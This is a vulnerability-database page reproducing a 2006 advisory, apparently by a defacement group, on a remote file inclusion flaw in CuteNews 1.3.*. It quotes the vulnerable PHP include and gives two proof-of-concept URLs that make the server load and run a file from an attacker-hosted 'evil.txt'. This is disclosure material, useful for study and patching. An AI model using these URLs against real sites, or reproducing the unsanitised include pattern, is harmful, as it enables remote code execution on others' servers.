Lucene search

cutenews13.txt

🗓️ 28 Aug 2006 00:00:00Reported by rUnViRuSType

packetstorm🔗 packetstormsecurity.com👁 51 Views

CuteNews 1.3.* Remote code execution vulnerability via cutepath parameter

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Welcome people In World Defacers Team  
  
[W]orld [D]efacers Team  
  
======================================  
  
--------------------Summary----------------  
  
eVuln ID: WD22  
  
Vendor: CuteNews 1.3.*  
  
Vendor's Web Site: http://cutephp.com/  
  
Software: Live Customer Support Solution :- http://www.pansionat.net/novost/  
  
Class: Remote  
  
PoC/Exploit: Available  
  
Solution: Not Available  
  
Discovered by: rUnViRuS (worlddefacers.de)  
  
-----------------Description---------------  
  
$cutepath = __FILE__;  
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);  
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);  
  
require_once("$cutepath/inc/functions.inc.php");  
  
--------------PoC/Exploit----------------------  
  
show_news.php?cutepath=http://host/evil.txt?  
search.php?cutepath=http://host/evil.txt?  
--------------Solution---------------------  
  
No Patch available.  
  
--------------Credit-----------------------  
  
Discovered by: rUnViRuS (worlddefacers.de)  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Aug 2006 00:00Current

7.4High risk

Vulners AI Score7.4